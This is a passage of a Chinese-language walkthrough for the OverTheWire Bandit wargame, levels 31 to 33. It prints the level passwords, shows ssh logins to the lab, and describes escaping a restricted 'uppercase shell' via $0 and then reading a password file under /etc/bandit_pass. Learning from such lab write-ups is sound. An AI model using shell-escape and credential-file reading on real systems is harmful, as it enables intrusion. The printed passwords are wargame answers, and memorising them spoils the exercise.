Writing objects: 100% (3/3), 324 bytes | 324.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K #bandit32密码
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost:2220/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://localhost:2220/home/bandit31-git/repo
获得下一级账号bandit32的密码为:3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K
ssh -p2220 bandit32@bandit.labs.overthewire.org #登录bandit32
33.level32-level33
goal:After all this git stuff, it’s time for another escape. Good luck!
经过所有这些 git 的操作之后,是时候进行另一次逃逸了。祝你好运!
- 解题思路:【$0会创建一个新bash执行$0里的命令】
截图如下:
--[ More information ]--
For more information regarding individual wargames, visit
http://www.overthewire.org/wargames/
For support, questions or comments, contact us on discord or IRC.
Enjoy your stay!
WELCOME TO THE UPPERCASE SHELL
>> $0
$ cat /etc/bandit_pass/bandit33
tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0
获得下一级账号bandit33的密码为:tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0
ssh -p2220 bandit33@bandit.labs.overthewire.org #登录bandit33